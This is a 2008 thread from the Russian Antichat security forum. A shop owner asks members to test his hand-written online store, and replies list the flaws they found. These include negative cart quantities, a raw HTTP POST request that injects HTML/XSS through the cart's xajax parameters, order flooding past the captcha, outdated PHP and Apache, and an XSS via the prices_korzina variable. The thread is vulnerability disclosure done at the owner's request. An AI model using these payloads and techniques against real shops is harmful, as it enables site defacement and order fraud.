ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Инет-магазин
  #1  
Старый 05.01.2008, 18:57
Аватар для SleepShadowWeb
SleepShadowWeb
Новичок
Регистрация: 02.02.2006
Сообщений: 28
Провел на форуме:
351198

Репутация: 54
По умолчанию Инет-магазин

сайт самописный, форумы не смотреть.
проверял Spider`ом вроде особо не находил такого критичного.
но для полной уверенности прошу Вашей помощи.
адрес сайта: http://green-leaf.ru/1/index1.php
 
Ответить с цитированием

  #2  
Старый 29.03.2008, 04:45
Аватар для d_x
d_x
Reservists Of Antichat - Level 6
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635

Репутация: 2407


По умолчанию

Пока нашёл, то что можно добавить в корзину отрицательное число товаров.
 
Ответить с цитированием

  #3  
Старый 29.03.2008, 11:50
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

XSS
хз как я это сделал, я так нелюблю в аяксе копаться поэтому запросы редактировал

Код:
POST http://green-leaf.ru/1/data/188.php HTTP/1.0
Method: POST http://green-leaf.ru/1/data/188.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.26 (Windows NT 5.1; U; ru)
Host: green-leaf.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Referer: http://green-leaf.ru/1/data/188.php
Cookie: prices_korzina=d80804d682988ec69ef6773be58b3044; Apache=86.106.217.37.377191206776053497
Cookie2: $Version=1
Proxy-Connection: close
Content-Length: 310
Content-Transfer-Encoding: binary

xajax=setDobInKorzina&xajaxr=120677663512'&xajaxargs[]=13366'&xajaxargs[]=<h1>Hello%20:)</h1>%20LG%20DGK774%20%D1%87%D0%B5%D1%80%D0%BD%D1%8B%D0%B9%20DVD%2BRW%2C%20DVD-R%2C%20-RW%2C%20MP3%2C%20JPEG%2C%20%D0%BA%D0%B0%D1%80%D0%B0%D0%BE%D0%BA%D0%B5&xajaxargs[]=<h1>O_o&xajaxargs[]=''%20%D0%BC%D0%B5%D1%81%20%D1%81%2F%D1%86
В базу так и добовляется с XSSными названиями, ппц, мне пришлют если я закажу домашний кинотеатр за 1$
=========================
http://green-leaf.ru/1/zakaz.php
Rfgnxf не обновляется, зажал enter он заказов 50 наверно отправил с 1 каптчи все приняты

Дальше давайте сами а я гамать иду
Кстати почему все товары хранятся на http://www.ultracomp.ru/

Последний раз редактировалось Ponchik; 29.03.2008 в 12:05..
 
Ответить с цитированием

  #4  
Старый 07.04.2008, 19:01
Аватар для SleepShadowWeb
SleepShadowWeb
Новичок
Регистрация: 02.02.2006
Сообщений: 28
Провел на форуме:
351198

Репутация: 54
По умолчанию

спасибо d_x и Ponchik
 
Ответить с цитированием

  #5  
Старый 08.04.2008, 09:14
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Чувак, тыж не исправил ничерта

И когда мне её доставят?

Ты передавай значения не через POST а через SESSION
 
Ответить с цитированием

  #6  
Старый 14.06.2008, 22:53
Аватар для AKYLA
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию

Ну тут в основном хостинг дырявый:
Цитата:
PHP HTML Entity Encoder Heap Overflow Vulnerability
Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1
Короче надо обновить им PHP и Апач профиксить
----------------------------------------
А на сайте:
XSS
korzina.php
Переменная prices_korzina
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
халявный инет stalles Болталка 4 22.02.2006 23:11
Про халявный инет))))))))))) silveran Аппаратное обеспечение 0 10.12.2005 03:39
Какие цены на инет в твоём городе? -artik- Болталка 31 14.09.2005 08:08
Сетка и шаровой инет vvs777 АнтиАдмин 6 21.12.2004 09:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ